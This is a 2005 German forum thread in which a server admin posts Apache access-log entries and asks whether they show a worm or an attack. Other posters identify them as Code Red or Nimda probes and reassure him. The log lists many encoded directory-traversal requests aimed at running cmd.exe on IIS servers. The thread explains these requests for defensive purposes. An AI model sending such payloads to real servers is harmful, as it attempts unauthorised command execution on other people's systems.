Wurm oder Hack ?

[keksdesgrauens]

Hoi forumleser

Ich hatte bisher keine Probleme mit meinem Server aber als ich heute in die Access.log des Apachen guggte fand ich folgendes.

Code: Select all

212.202.181.207 - - [30/Jan/2005:00:33:53 +0100] "GET /vwar/news.php HTTP/1.1" 404 1247 "http://dean2win.freeserverhost.com/disturbed/index.htm" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
81.229.0.117 - - [30/Jan/2005:06:59:40 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:40 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:40 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:41 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:41 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:41 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:41 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:41 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:41 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:42 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:42 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:42 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:42 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 968 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:42 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 968 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:42 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
81.229.0.117 - - [30/Jan/2005:06:59:42 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1035 "-" "-"
68.142.251.151 - - [30/Jan/2005:10:23:06 +0100] "GET /robots.txt HTTP/1.0" 404 1048 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
68.142.251.194 - - [30/Jan/2005:10:23:06 +0100] "GET / HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
220.65.97.133 - - [30/Jan/2005:21:41:44 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"

die letzten 3 sind klar das sind robots. Aber der rest ist mir unklar.
Da versucht jmd die Kommando konsolen von M$ zu starten ?

[chris76]

Hi,

Ich kann mir nicht vorstellen, das .exe auf deinem Server eine Rolle Spielt. Von daher brauchst du dir IMHO keine Gedanken machen.
Das ganz sieht mir auch sehr nach Wurm aus (mir fällt der Name nur nicht mehr ein), der versucht diverse .exe nach einem gewissen Schema zu suchen.

[keksdesgrauens]

Thnx für die schnelle antwort. Da bin ich nu erstmal beruhigt und kann die baldriantropfen wieder weg stellen ;0)

[suntzu]

Bei Access-Logs und Hacks fällt mir im Moment eigentlich nur eins ein:

http://www.intern.de/news/6389.html

SCNR,
Dominik

[smash]

das ganze sieht mir eher nach nem nessus scan aus

[captaincrunch]

Kannst du uns vielleicht noch "Beweise" für diese Behauptung nennen?

[dodolin]

Meine Güte, ist es wirklich so schwierig, das ganze in Google einzuwerfen?!

http://www.google.de/search?hl=de&q=apa ... %2Fc%2Bdir

Code Red und Nimba liest man da...

@SunTzu: Hab vermutlich den Witz nicht verstanden, aber ich checke gerade nicht, was die Seite mit dem Thema hier zu tun haben soll...

das ganze sieht mir eher nach nem nessus scan aus

Nein, glaube ich nicht. Siehe oben.

[suntzu]

@SunTzu: Hab vermutlich den Witz nicht verstanden, aber ich checke gerade nicht, was die Seite mit dem Thema hier zu tun haben soll...

Die Tatsache, dass man einen Eintrag im Access-Log direkt als bösen Akt versteht.

Aber gut, ich bin gerade auf so nem Trip... Fragt nicht, Prüfungsstress *gg*

Gruß,
Dominik

[keksdesgrauens]

hm wenn man von dem Log ausgeht welches "zugriffs_log" heisst gehe ich davon aus das auf meinem apache erfolgreich zugegriffen wurde...da ich zu dem zeitpunkt nichts im error_log stehen hatte ging ich eben davon aus das versucht wurde von meinem server aus irgedendwelche attacken aus zu starten.

ich brauchte mich bisher mit dem auswerten von logdatein nicht beschäftigen...naja nu hab ich wieder was dazu gelernt.

[niemand]

mach mal netstat - und wenn da was von heise.de zu lesen, fahr die Kiste runter!
*scnr*

cu

[keksdesgrauens]

ups nu hab ich doch den tip von "niemand" mal aus probiert und nu hab ich doch glatt KDe auf gespielt ......krieg ich das den wieder mit ps aux deinstalliert ?...oder muss ich nu nen format c: machen ?

ok spass bei seite ....ich bedanke mich für die hilfe und bei den einen oder anderen für den sinnvollen tip ;0)

[niemand]

Hey, so abwegig war das nicht: Ein geknackter Server lässt sich wunderbar als Slave für DDoS missbrauchen, und in bestimmten Fällen zeigt netstat die entsprechenden Verbindungen an.

cu

[keksdesgrauens]

ok nach dem ich heute gelesen hab das heise.de geddost wurde hast du natürlich recht. ich hielt deine antwort für sarkasmus da hier sowas öfters vorkommt :oops: